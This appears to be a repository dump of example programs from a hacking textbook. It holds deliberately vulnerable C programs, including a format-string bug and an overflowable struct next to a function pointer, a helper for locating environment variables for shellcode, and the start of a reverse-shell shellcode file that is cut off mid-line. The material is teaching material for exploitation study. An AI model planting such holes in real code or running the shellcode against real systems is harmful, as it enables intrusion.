exit(0); 12 | } 13 | strcpy(text, argv[1]); 14 | 15 | printf("The right way to print user-controlled input:\n"); 16 | printf("%s", text); 17 | 18 | 19 | printf("\nThe wrong way to print user-controlled input:\n"); 20 | printf(text); 21 | 22 | printf("\n"); 23 | 24 | // Debug output 25 | printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val); 26 | 27 | exit(0); 28 | } 29 | -------------------------------------------------------------------------------- /fmt_vuln2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | int main(int argc, char *argv[]) { 6 | char text[1024]; 7 | static int test_val = -72, next_val = 0x11111111; 8 | 9 | if(argc < 2) { 10 | printf("Usage: %s <text to print>\n", argv[0]); 11 | exit(0); 12 | } 13 | strcpy(text, argv[1]); 14 | 15 | printf("The right way to print user-controlled input:\n"); 16 | printf("%s", text); 17 | 18 | 19 | printf("\nThe wrong way to print user-controlled input:\n"); 20 | printf(text); 21 | 22 | printf("\n"); 23 | 24 | // Debug output 25 | printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val); 26 | printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val); 27 | 28 | exit(0); 29 | } 30 | -------------------------------------------------------------------------------- /funcptr_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int func_one() { 4 | printf("This is function one\n"); 5 | return 1; 6 | } 7 | 8 | int func_two() { 9 | printf("This is function two\n"); 10 | return 2; 11 | } 12 | 13 | int main() { 14 | int value; 15 | int (*function_ptr) (); 16 | 17 | function_ptr = func_one; 18 | printf("function_ptr is 0x%08x\n", function_ptr); 19 | value = function_ptr(); 20 | printf("value returned was %d\n", value); 21 | 22 | function_ptr = func_two; 23 | printf("function_ptr is 0x%08x\n", function_ptr); 24 | value = function_ptr(); 25 | printf("value returned was %d\n", value); 26 | } 27 | 28 | -------------------------------------------------------------------------------- /game_of_chance.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <string.h> 3 | #include <fcntl.h> 4 | #include <sys/stat.h> 5 | #include <time.h> 6 | #include <stdlib.h> 7 | #include "hacking.h" 8 | 9 | #define DATAFILE "/var/chance.data" // File to store user data 10 | 11 | // Custom user struct to store information about users 12 | struct user { 13 | int uid; 14 | int credits; 15 | int highscore; 16 | char name[100]; 17 | int (*current_game) (); 18 | }; 19 | 20 | // function prototypes 21 | int get_player_data(); 22 | void register_new_player(); 23 | void update_player_data(); 24 | void show_highscore(); 25 | void jackpot(); 26 | void input_name(); 27 | void print_cards(char *, char *, int); 28 | int take_wager(int, int); 29 | void play_the_game(); 30 | int pick_a_number(); 31 | int dealer_no_match(); 32 | int find_the_ace(); 33 | void fatal(char *); 34 | 35 | // Global variables 36 | struct user player; // Player struct 37 | 38 | int main() { 39 | int choice, last_game; 40 | 41 | srand(time(0)); // Seed the randomizer with the current time. 42 | 43 | if(get_player_data() == -1) // Try to read player data from file. 44 | register_new_player(); // If there is no data, register a new player. 45 | 46 | while(choice != 7) { 47 | printf("-=[ Game of Chance Menu ]=-\n"); 48 | printf("1 - Play the Pick a Number game\n"); 49 | printf("2 - Play the No Match Dealer game\n"); 50 | printf("3 - Play the Find the Ace game\n"); 51 | printf("4 - View current high score\n"); 52 | printf("5 - Change your user name\n"); 53 | printf("6 - Reset your account at 100 credits\n"); 54 | printf("7 - Quit\n"); 55 | printf("[Name: %s]\n", player.name); 56 | printf("[You have %u credits] -> ", player.credits); 57 | scanf("%d", &choice); 58 | 59 | if((choice < 1) || (choice > 7)) 60 | printf("\n[!!] The number %d is an invalid selection.\n\n", choice); 61 | else if (choice < 4) { // Othewise, choice was a game of some sort. 62 | if(choice != last_game) { // If the function ptr isn't set 63 | if(choice == 1) // then point it at the selected game 64 | player.current_game = pick_a_number; 65 | else if(choice == 2) 66 | player.current_game = dealer_no_match; 67 | else 68 | player.current_game = find_the_ace; 69 | last_game = choice; // and set last_game. 70 | } 71 | play_the_game(); // Play the game. 72 | } 73 | else if (choice == 4) 74 | show_highscore(); 75 | else if (choice == 5) { 76 | printf("\nChange user name\n"); 77 | printf("Enter your new name: "); 78 | input_name(); 79 | printf("Your name has been changed.\n\n"); 80 | } 81 | else if (choice == 6) { 82 | printf("\nYour account has been reset with 100 credits.\n\n"); 83 | player.credits = 100; 84 | } 85 | } 86 | update_player_data(); 87 | printf("\nThanks for playing! Bye.\n"); 88 | } 89 | 90 | // This function reads the player data for the current uid 91 | // from the file. It returns -1 if it is unable to find player 92 | // data for the current uid. 93 | int get_player_data() { 94 | int fd, uid, read_bytes; 95 | struct user entry; 96 | 97 | uid = getuid(); 98 | 99 | fd = open(DATAFILE, O_RDONLY); 100 | if(fd == -1) // Can't open the file, maybe it doesn't exist 101 | return -1; 102 | read_bytes = read(fd, &entry, sizeof(struct user)); // Read the first chunk. 103 | while(entry.uid != uid && read_bytes > 0) { // Loop until proper uid is found. 104 | read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading. 105 | } 106 | close(fd); // close the file 107 | if(read_bytes < sizeof(struct user)) // This means that the end of file was reached. 108 | return -1; 109 | else 110 | player = entry; // Copy the read entry into the player struct. 111 | return 1; // Return a success. 112 | } 113 | 114 | // This is the new user registration function. 115 | // It will create a new player account and append it to the file 116 | void register_new_player() { 117 | int fd; 118 | 119 | printf("-=-={ New Player Registration }=-=-\n"); 120 | printf("Enter your name: "); 121 | input_name(); 122 | 123 | player.uid = getuid(); 124 | player.highscore = player.credits = 100; 125 | 126 | fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); 127 | if(fd == -1) 128 | fatal("in register_new_player() while opening file"); 129 | write(fd, &player, sizeof(struct user)); 130 | close(fd); 131 | 132 | printf("\nWelcome to the Game of Chance %s.\n", player.name); 133 | printf("You have been given %u credits.\n", player.credits); 134 | } 135 | 136 | // This function writes the current player data to the file. 137 | // It is used primarily for updating the credits after games. 138 | void update_player_data() { 139 | int fd, i, read_uid; 140 | char burned_byte; 141 | 142 | fd = open(DATAFILE, O_RDWR); 143 | if(fd == -1) // If open fails here, something is really wrong. 144 | fatal("in update_player_data() while opening file"); 145 | read(fd, &read_uid, 4); // Read the uid from the first struct. 146 | while(read_uid != player.uid) { // Loop until correct uid is found. 147 | for(i=0; i < sizeof(struct user) - 4; i++) // Read through the 148 | read(fd, &burned_byte, 1); // rest of that struct. 149 | read(fd, &read_uid, 4); // Read the uid from the next struct. 150 | } 151 | write(fd, &(player.credits), 4); // Update credits. 152 | write(fd, &(player.highscore), 4); // Update highscore. 153 | write(fd, &(player.name), 100); // Update name. 154 | close(fd); 155 | } 156 | 157 | // This function will display the current high score and 158 | // the name of the person who set that high score. 159 | void show_highscore() { 160 | unsigned int top_score = 0; 161 | char top_name[100]; 162 | struct user entry; 163 | int fd; 164 | 165 | printf("\n====================| HIGH SCORE |====================\n"); 166 | fd = open(DATAFILE, O_RDONLY); 167 | if(fd == -1) 168 | fatal("in show_highscore() while opening file"); 169 | while(read(fd, &entry, sizeof(struct user)) > 0) { // Loop until end of file. 170 | if(entry.highscore > top_score) { // If there is a higher score, 171 | top_score = entry.highscore; // set top_score to that score 172 | strcpy(top_name, entry.name); // and top_name to that username. 173 | } 174 | } 175 | close(fd); 176 | if(top_score > player.highscore) 177 | printf("%s has the high score of %u\n", top_name, top_score); 178 | else 179 | printf("You currently have the high score of %u credits!\n", player.highscore); 180 | printf("======================================================\n\n"); 181 | } 182 | 183 | // This function simply awards the jackpot for the Pick a Number game 184 | void jackpot() { 185 | printf("*+*+*+*+*+* JACKPOT *+*+*+*+*+*\n"); 186 | printf("You have won the jackpot of 100 credits!\n"); 187 | player.credits += 100; 188 | } 189 | 190 | // This function is used to input the player name, since 191 | // scanf("%s", &whatever) will stop input at the first space. 192 | void input_name() { 193 | char *name_ptr, input_char='\n'; 194 | while(input_char == '\n') // Flush any leftover 195 | scanf("%c", &input_char); // newline chars. 196 | 197 | name_ptr = (char *) &(player.name); // name_ptr = player name's address 198 | while(input_char != '\n') { // Loop until newline. 199 | *name_ptr = input_char; // Put the input char into name field. 200 | scanf("%c", &input_char); // Get the next char. 201 | name_ptr++; // Increment the name pointer. 202 | } 203 | *name_ptr = 0; // Terminate the string. 204 | } 205 | 206 | // This function prints the 3 cards for the Find the Ace game. 207 | // It expects a message to display, a pointer to the cards array, 208 | // and the card the user has picked as input. If the user_pick is 209 | // -1, then the selection numbers are displayed. 210 | void print_cards(char *message, char *cards, int user_pick) { 211 | int i; 212 | 213 | printf("\n\t*** %s ***\n", message); 214 | printf(" \t._.\t._.\t._.\n"); 215 | printf("Cards:\t|%c|\t|%c|\t|%c|\n\t", cards[0], cards[1], cards[2]); 216 | if(user_pick == -1) 217 | printf(" 1 \t 2 \t 3\n"); 218 | else { 219 | for(i=0; i < user_pick; i++) 220 | printf("\t"); 221 | printf(" ^-- your pick\n"); 222 | } 223 | } 224 | 225 | // This function inputs wagers for both the No Match Dealer and 226 | // Find the Ace games. It expects the available credits and the 227 | // previous wager as arguments. The previous_wager is only important 228 | // for the second wager in the Find the Ace game. The function 229 | // returns -1 if the wager is too big or too little, and it returns 230 | // the wager amount otherwise. 231 | int take_wager(int available_credits, int previous_wager) { 232 | int wager, total_wager; 233 | 234 | printf("How many of your %d credits would you like to wager? ", available_credits); 235 | scanf("%d", &wager); 236 | if(wager < 1) { // Make sure the wager is greater than 0. 237 | printf("Nice try, but you must wager a positive number!\n"); 238 | return -1; 239 | } 240 | total_wager = previous_wager + wager; 241 | if(total_wager > available_credits) { // Confirm available credits 242 | printf("Your total wager of %d is more than you have!\n", total_wager); 243 | printf("You only have %d available credits, try again.\n", available_credits); 244 | return -1; 245 | } 246 | return wager; 247 | } 248 | 249 | // This function contains a loop to allow the current game to be 250 | // played again. It also writes the new credit totals to file 251 | // after each game is played. 252 | void play_the_game() { 253 | int play_again = 1; 254 | int (*game) (); 255 | char selection; 256 | 257 | while(play_again) { 258 | printf("\n[DEBUG] current_game pointer @ 0x%08x\n", player.current_game); 259 | if(player.current_game() != -1) { // If the game plays without error and 260 | if(player.credits > player.highscore) // a new high score is set, 261 | player.highscore = player.credits; // update the highscore. 262 | printf("\nYou now have %u credits\n", player.credits); 263 | update_player_data(); // Write the new credit total to file. 264 | printf("Would you like to play again? (y/n) "); 265 | selection = '\n'; 266 | while(selection == '\n') // Flush any extra newlines. 267 | scanf("%c", &selection); 268 | if(selection == 'n') 269 | play_again = 0; 270 | } 271 | else // This means the game returned an error, 272 | play_again = 0; // so return to main menu. 273 | } 274 | } 275 | 276 | // This function is the Pick a Number game. 277 | // It returns -1 if the player doesn't have enough credits. 278 | int pick_a_number() { 279 | int pick, winning_number; 280 | 281 | printf("\n####### Pick a Number ######\n"); 282 | printf("This game costs 10 credits to play. Simply pick a number\n"); 283 | printf("between 1 and 20, and if you pick the winning number, you\n"); 284 | printf("will win the jackpot of 100 credits!\n\n"); 285 | winning_number = (rand() % 20) + 1; // Pick a number between 1 and 20. 286 | if(player.credits < 10) { 287 | printf("You only have %d credits. That's not enough to play!\n\n", player.credits); 288 | return -1; // Not enough credits to play 289 | } 290 | player.credits -= 10; // Deduct 10 credits 291 | printf("10 credits have been deducted from your account.\n"); 292 | printf("Pick a number between 1 and 20: "); 293 | scanf("%d", &pick); 294 | 295 | printf("The winning number is %d\n", winning_number); 296 | if(pick == winning_number) 297 | jackpot(); 298 | else 299 | printf("Sorry, you didn't win.\n"); 300 | return 0; 301 | } 302 | 303 | // This is the No Match Dealer game. 304 | // It returns -1 if the player has 0 credits. 305 | int dealer_no_match() { 306 | int i, j, numbers[16], wager = -1, match = -1; 307 | 308 | printf("\n::::::: No Match Dealer :::::::\n"); 309 | printf("In this game, you can wager up to all of your credits.\n"); 310 | printf("The dealer will deal out 16 random numbers between 0 and 99.\n"); 311 | printf("If there are no matches among them, you double your money!\n\n"); 312 | 313 | if(player.credits == 0) { 314 | printf("You don't have any credits to wager!\n\n"); 315 | return -1; 316 | } 317 | while(wager == -1) 318 | wager = take_wager(player.credits, 0); 319 | 320 | printf("\t\t::: Dealing out 16 random numbers :::\n"); 321 | for(i=0; i < 16; i++) { 322 | numbers[i] = rand() % 100; // pick a number 0 to 99 323 | printf("%2d\t", numbers[i]); 324 | if(i%8 == 7) // Print a line break every 8 numbers. 325 | printf("\n"); 326 | } 327 | for(i=0; i < 15; i++) { // Loop looking for matches 328 | j = i + 1; 329 | while(j < 16) { 330 | if(numbers[i] == numbers[j]) 331 | match = numbers[i]; 332 | j++; 333 | } 334 | } 335 | if(match != -1) { 336 | printf("The dealer matched the number %d!\n", match); 337 | printf("You lose %d credits.\n", wager); 338 | player.credits -= wager; 339 | } else { 340 | printf("There were no matches! You win %d credits!\n", wager); 341 | player.credits += wager; 342 | } 343 | return 0; 344 | } 345 | 346 | // This is the Find the Ace game. 347 | // It returns -1 if the player has 0 credits. 348 | int find_the_ace() { 349 | int i, ace, total_wager; 350 | int invalid_choice, pick = -1, wager_one = -1, wager_two = -1; 351 | char choice_two, cards[3] = {'X', 'X', 'X'}; 352 | 353 | ace = rand()%3; // Place the ace randomly. 354 | 355 | printf("******* Find the Ace *******\n"); 356 | printf("In this game, you can wager up to all of your credits.\n"); 357 | printf("Three cards will be dealt out, two queens and one ace.\n"); 358 | printf("If you find the ace, you will win your wager.\n"); 359 | printf("After choosing a card, one of the queens will be revealed.\n"); 360 | printf("At this point, you may either select a different card or\n"); 361 | printf("increase your wager.\n\n"); 362 | 363 | if(player.credits == 0) { 364 | printf("You don't have any credits to wager!\n\n"); 365 | return -1; 366 | } 367 | 368 | while(wager_one == -1) // Loop until valid wager is made. 369 | wager_one = take_wager(player.credits, 0); 370 | 371 | print_cards("Dealing cards", cards, -1); 372 | pick = -1; 373 | while((pick < 1) || (pick > 3)) { // Loop until valid pick is made. 374 | printf("Select a card: 1, 2, or 3 "); 375 | scanf("%d", &pick); 376 | } 377 | pick--; // Adjust the pick since card numbering starts at 0. 378 | i=0; 379 | while(i == ace || i == pick) // Keep looping until 380 | i++; // we find a valid queen to reveal. 381 | cards[i] = 'Q'; 382 | print_cards("Revealing a queen", cards, pick); 383 | invalid_choice = 1; 384 | while(invalid_choice) { // Loop until valid choice is made. 385 | printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n"); 386 | printf("Select c or i: "); 387 | choice_two = '\n'; 388 | while(choice_two == '\n') // Flush extra newlines. 389 | scanf("%c", &choice_two); 390 | if(choice_two == 'i') { // Increase wager. 391 | invalid_choice=0; // This is a valid choice. 392 | while(wager_two == -1) // Loop until valid second wager is made. 393 | wager_two = take_wager(player.credits, wager_one); 394 | } 395 | if(choice_two == 'c') { // Change pick. 396 | i = invalid_choice = 0; // Valid choice 397 | while(i == pick || cards[i] == 'Q') // Loop until the other card 398 | i++;// is found, 399 | pick = i;// and then swap pick. 400 | printf("Your card pick has been changed to card %d\n", pick+1); 401 | } 402 | } 403 | 404 | for(i=0; i < 3; i++) { // Reveal all of the cards. 405 | if(ace == i) 406 | cards[i] = 'A'; 407 | else 408 | cards[i] = 'Q'; 409 | } 410 | print_cards("End result", cards, pick); 411 | 412 | if(pick == ace) { // handle win 413 | printf("You have won %d credits from your first wager\n", wager_one); 414 | player.credits += wager_one; 415 | if(wager_two != -1) { 416 | printf("and an additional %d credits from your second wager!\n", wager_two); 417 | player.credits += wager_two; 418 | } 419 | } else { // handle loss 420 | printf("You have lost %d credits from your first wager\n", wager_one); 421 | player.credits -= wager_one; 422 | if(wager_two != -1) { 423 | printf("and an additional %d credits from your second wager!\n", wager_two); 424 | player.credits -= wager_two; 425 | } 426 | } 427 | return 0; 428 | } 429 | -------------------------------------------------------------------------------- /getenv_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | int main(int argc, char *argv[]) { 5 | printf("%s is at %p\n", argv[1], getenv(argv[1])); 6 | } 7 | -------------------------------------------------------------------------------- /getenvaddr.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | int main(int argc, char *argv[]) { 6 | char *ptr; 7 | 8 | if(argc < 3) { 9 | printf("Usage: %s <environment variable> <target program name>\n", argv[0]); 10 | exit(0); 11 | } 12 | ptr = getenv(argv[1]); /* get env var location */ 13 | ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */ 14 | printf("%s will be at %p\n", argv[1], ptr); 15 | } 16 | -------------------------------------------------------------------------------- /hacking-network.h: -------------------------------------------------------------------------------- 1 | /* This function accepts a socket FD and a ptr to the null terminated 2 | * string to send. The function will make sure all the bytes of the 3 | * string are sent. Returns 1 on success and 0 on failure. 4 | */ 5 | int send_string(int sockfd, unsigned char *buffer) { 6 | int sent_bytes, bytes_to_send; 7 | bytes_to_send = strlen(buffer); 8 | while(bytes_to_send > 0) { 9 | sent_bytes = send(sockfd, buffer, bytes_to_send, 0); 10 | if(sent_bytes == -1) 11 | return 0; // return 0 on send error 12 | bytes_to_send -= sent_bytes; 13 | buffer += sent_bytes; 14 | } 15 | return 1; // return 1 on success 16 | } 17 | 18 | /* This function accepts a socket FD and a ptr to a destination 19 | * buffer. It will receive from the socket until the EOL byte 20 | * sequence in seen. The EOL bytes are read from the socket, but 21 | * the destination buffer is terminated before these bytes. 22 | * Returns the size of the read line (without EOL bytes). 23 | */ 24 | int recv_line(int sockfd, unsigned char *dest_buffer) { 25 | #define EOL "\r\n" // End-Of-Line byte sequence 26 | #define EOL_SIZE 2 27 | unsigned char *ptr; 28 | int eol_matched = 0; 29 | 30 | ptr = dest_buffer; 31 | while(recv(sockfd, ptr, 1, 0) == 1) { // read a single byte 32 | if(*ptr == EOL[eol_matched]) { // does this byte match terminator 33 | eol_matched++; 34 | if(eol_matched == EOL_SIZE) { // if all bytes match terminator, 35 | *(ptr+1-EOL_SIZE) = '\0'; // terminate the string 36 | return strlen(dest_buffer); // return bytes recevied 37 | } 38 | } else { 39 | eol_matched = 0; 40 | } 41 | ptr++; // increment the pointer to the next byter; 42 | } 43 | return 0; // didn't find the end of line characters 44 | } 45 | 46 | 47 | /* Structure for Ethernet headers */ 48 | #define ETHER_ADDR_LEN 6 49 | #define ETHER_HDR_LEN 14 50 | 51 | struct ether_hdr { 52 | unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address 53 | unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address 54 | unsigned short ether_type; // Type of Ethernet packet 55 | }; 56 | 57 | /* Structure for Internet Protocol (IP) headers */ 58 | struct ip_hdr { 59 | unsigned char ip_version_and_header_length; // version and header length combined 60 | unsigned char ip_tos; // type of service 61 | unsigned short ip_len; // total length 62 | unsigned short ip_id; // identification number 63 | unsigned short ip_frag_offset; // fragment offset and flags 64 | unsigned char ip_ttl; // time to live 65 | unsigned char ip_type; // protocol type 66 | unsigned short ip_checksum; // checksum 67 | unsigned int ip_src_addr; // source IP address 68 | unsigned int ip_dest_addr; // destination IP address 69 | }; 70 | 71 | /* Structure for Transmission Control Protocol (TCP) headers */ 72 | struct tcp_hdr { 73 | unsigned short tcp_src_port; // source TCP port 74 | unsigned short tcp_dest_port; // destination TCP port 75 | unsigned int tcp_seq; // TCP sequence number 76 | unsigned int tcp_ack; // TCP acknowledgement number 77 | unsigned char reserved:4; // 4-bits from the 6-bits of reserved space 78 | unsigned char tcp_offset:4; // TCP data offset for little endian host 79 | unsigned char tcp_flags; // TCP flags (and 2-bits from reserved space) 80 | #define TCP_FIN 0x01 81 | #define TCP_SYN 0x02 82 | #define TCP_RST 0x04 83 | #define TCP_PUSH 0x08 84 | #define TCP_ACK 0x10 85 | #define TCP_URG 0x20 86 | unsigned short tcp_window; // TCP window size 87 | unsigned short tcp_checksum; // TCP checksum 88 | unsigned short tcp_urgent; // TCP urgent pointer 89 | }; 90 | -------------------------------------------------------------------------------- /hacking.h: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | // A function to display an error message and then exit 6 | void fatal(char *message) { 7 | char error_message[100]; 8 | 9 | strcpy(error_message, "[!!] Fatal Error "); 10 | strncat(error_message, message, 83); 11 | perror(error_message); 12 | exit(-1); 13 | } 14 | 15 | // An error checked malloc() wrapper function 16 | void *ec_malloc(unsigned int size) { 17 | void *ptr; 18 | ptr = malloc(size); 19 | if(ptr == NULL) 20 | fatal("in ec_malloc() on memory allocation"); 21 | return ptr; 22 | } 23 | 24 | // dumps raw memory in hex byte and printable split format 25 | void dump(const unsigned char *data_buffer, const unsigned int length) { 26 | unsigned char byte; 27 | unsigned int i, j; 28 | for(i=0; i < length; i++) { 29 | byte = data_buffer[i]; 30 | printf("%02x ", data_buffer[i]); // display byte in hex 31 | if(((i%16)==15) || (i==length-1)) { 32 | for(j=0; j < 15-(i%16); j++) 33 | printf(" "); 34 | printf("| "); 35 | for(j=(i-(i%16)); j <= i; j++) { // display printable bytes from line 36 | byte = data_buffer[j]; 37 | if((byte > 31) && (byte < 127)) // outside printable char range 38 | printf("%c", byte); 39 | else 40 | printf("."); 41 | } 42 | printf("\n"); // end of the dump line (each line 16 bytes) 43 | } // end if 44 | } // end for 45 | } 46 | 47 | -------------------------------------------------------------------------------- /heap_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | 5 | int main(int argc, char *argv[]) { 6 | char *char_ptr; // a char pointer 7 | int *int_ptr; // an integer pointer 8 | int mem_size; 9 | 10 | if (argc < 2) // if there aren't commandline arguments, 11 | mem_size = 50; // use 50 as the default value.. 12 | else 13 | mem_size = atoi(argv[1]); 14 | 15 | printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size); 16 | char_ptr = (char *) malloc(mem_size); // allocating heap memory 17 | 18 | if(char_ptr == NULL) { // error checking, in case malloc() fails 19 | fprintf(stderr, "Error: could not allocate heap memory.\n"); 20 | exit(-1); 21 | } 22 | 23 | strcpy(char_ptr, "This is memory is located on the heap."); 24 | printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr); 25 | 26 | printf("\t[+] allocating 12 bytes of memory on the heap for int_ptr\n"); 27 | int_ptr = (int *) malloc(12); // allocated heap memory again 28 | 29 | if(int_ptr == NULL) { // error checking, in case malloc() fails 30 | fprintf(stderr, "Error: could not allocate heap memory.\n"); 31 | exit(-1); 32 | } 33 | 34 | *int_ptr = 31337; // put the value of 31337 where int_ptr is pointing 35 | printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr); 36 | 37 | 38 | printf("\t[-] freeing char_ptr's heap memory...\n"); 39 | free(char_ptr); // freeing heap memory 40 | 41 | printf("\t[+] allocating another 15 bytes for char_ptr\n"); 42 | char_ptr = (char *) malloc(15); // allocating more heap memory 43 | 44 | if(char_ptr == NULL) { // error checking, in case malloc() fails 45 | fprintf(stderr, "Error: could not allocate heap memory.\n"); 46 | exit(-1); 47 | } 48 | 49 | strcpy(char_ptr, "new memory"); 50 | printf("char_ptr (%p) --> '%s'\n", char_ptr, char_ptr); 51 | 52 | printf("\t[-] freeing int_ptr's heap memory...\n"); 53 | free(int_ptr); // freeing heap memory 54 | printf("\t[-] freeing char_ptr's heap memory...\n"); 55 | free(char_ptr); // freeing the other block of heap memory 56 | } 57 | -------------------------------------------------------------------------------- /helloworld.asm: -------------------------------------------------------------------------------- 1 | section .data ; data segment 2 | msg db "Hello, world!", 0x0a ; the string and newline char 3 | 4 | section .text ; text segment 5 | global _start ; Default entry point for ELF linking 6 | 7 | _start: 8 | ; SYSCALL: write(1, msg, 14) 9 | mov eax, 4 ; put 4 into eax, since write is syscall #4 10 | mov ebx, 1 ; put 1 into ebx, since stdout is 1 11 | mov ecx, msg ; put the address of the string into ecx 12 | mov edx, 14 ; put 14 into edx, since our string is 14 bytes 13 | int 0x80 ; Call the kernel to make the system call happen 14 | 15 | ; SYSCALL: exit(0) 16 | mov eax, 1 ; put 1 into eax, since exit is syscall #1 17 | mov ebx, 0 ; exit with success 18 | int 0x80 ; do the syscall 19 | -------------------------------------------------------------------------------- /helloworld.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | int main() { 3 | printf("Hello World.\n"); 4 | return 0; 5 | } 6 | -------------------------------------------------------------------------------- /helloworld.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/helloworld.o -------------------------------------------------------------------------------- /helloworld1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/helloworld1 -------------------------------------------------------------------------------- /helloworld1.s: -------------------------------------------------------------------------------- 1 | BITS 32 ; tell nasm this is 32-bit code 2 | 3 | call mark_below ; call below the string to instructions 4 | db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes 5 | 6 | mark_below: 7 | ; ssize_t write(int fd, const void *buf, size_t count); 8 | pop ecx ; pop the return address (string ptr) into ecx 9 | mov eax, 4 ; write syscall # 10 | mov ebx, 1 ; STDOUT file descriptor 11 | mov edx, 15 ; length of the string 12 | int 0x80 ; do syscall: write(1, string, 14) 13 | 14 | ; void _exit(int status); 15 | mov eax, 1 ; exit syscall # 16 | mov ebx, 0 ; status = 0 17 | int 0x80 ; do syscall: exit(0) 18 | -------------------------------------------------------------------------------- /helloworld2.s: -------------------------------------------------------------------------------- 1 | BITS 32 ; tell nasm this is 32-bit code 2 | 3 | jmp short one ; jump down to a call at the end 4 | 5 | two: 6 | ; ssize_t write(int fd, const void *buf, size_t count); 7 | pop ecx ; pop the return address (string ptr) into ecx 8 | mov eax, 4 ; write syscall # 9 | mov ebx, 1 ; STDOUT file descriptor 10 | mov edx, 15 ; length of the string 11 | int 0x80 ; do syscall: write(1, string, 14) 12 | 13 | ; void _exit(int status); 14 | mov eax, 1 ; exit syscall # 15 | mov ebx, 0 ; status = 0 16 | int 0x80 ; do syscall: exit(0) 17 | 18 | one: 19 | call two ; call back upwards to avoid null bytes 20 | db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes 21 | 22 | -------------------------------------------------------------------------------- /helloworld3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/helloworld3 -------------------------------------------------------------------------------- /helloworld3.s: -------------------------------------------------------------------------------- 1 | BITS 32 ; tell nasm this is 32-bit code 2 | 3 | jmp short one ; jump down to a call at the end 4 | 5 | two: 6 | ; ssize_t write(int fd, const void *buf, size_t count); 7 | pop ecx ; pop the return address (string ptr) into ecx 8 | xor eax, eax ; zero out full 32-bits of eax register 9 | mov al, 4 ; write syscall #4 to the low byte of eax 10 | xor ebx, ebx ; zero out ebx 11 | inc ebx ; increment ebx to 1, STDOUT file descriptor 12 | xor edx, edx 13 | mov dl, 15 ; length of the string 14 | int 0x80 ; do syscall: write(1, string, 14) 15 | 16 | ; void _exit(int status); 17 | mov al, 1 ; exit syscall #1, the top 3 bytes are still zeroed 18 | dec ebx ; decrement ebx back down to 0 for status = 0 19 | int 0x80 ; do syscall: exit(0) 20 | 21 | one: 22 | call two ; call back upwards to avoid null bytes 23 | db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes 24 | 25 | -------------------------------------------------------------------------------- /host_lookup.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | 8 | #include <netdb.h> 9 | 10 | #include "hacking.h" 11 | 12 | int main(int argc, char *argv[]) { 13 | struct hostent *host_info; 14 | struct in_addr *address; 15 | 16 | if(argc < 2) { 17 | printf("Usage: %s <hostname>\n", argv[0]); 18 | exit(1); 19 | } 20 | 21 | host_info = gethostbyname(argv[1]); 22 | if(host_info == NULL) { 23 | printf("Couldn't lookup %s\n", argv[1]); 24 | } else { 25 | address = (struct in_addr *) (host_info->h_addr); 26 | printf("%s has address %s\n", argv[1], inet_ntoa(*address)); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /input.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <string.h> 3 | 4 | int main() { 5 | char message[10]; 6 | int count, i; 7 | 8 | strcpy(message, "Hello, world!"); 9 | 10 | printf("Repeat how many times? "); 11 | scanf("%d", &count); 12 | 13 | for(i=0; i < count; i++) 14 | printf("%3d - %s\n", i, message); 15 | } 16 | -------------------------------------------------------------------------------- /loopback_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/loopback_shell -------------------------------------------------------------------------------- /loopback_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; s = socket(2, 1, 0) 4 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 5 | pop eax 6 | cdq ; zero out edx for use as a null DWORD later 7 | xor ebx, ebx ; ebx is the type of socketcall 8 | inc ebx ; 1 = SYS_SOCKET = socket() 9 | push edx ; Build arg array: { protocol = 0, 10 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 11 | push BYTE 0x2 ; AF_INET = 2 } 12 | mov ecx, esp ; ecx = ptr to argument array 13 | int 0x80 ; after syscall, eax has socket file descriptor 14 | 15 | xchg esi, eax ; save socket FD in esi for later 16 | 17 | ; connect(s, [2, 31337, <IP address>], 16) 18 | push BYTE 0x66 ; socketcall (syscall #102) 19 | pop eax 20 | inc ebx ; ebx = 2 (needed for AF_INET) 21 | push DWORD 0x01BBBB7f ; Build sockaddr struct: 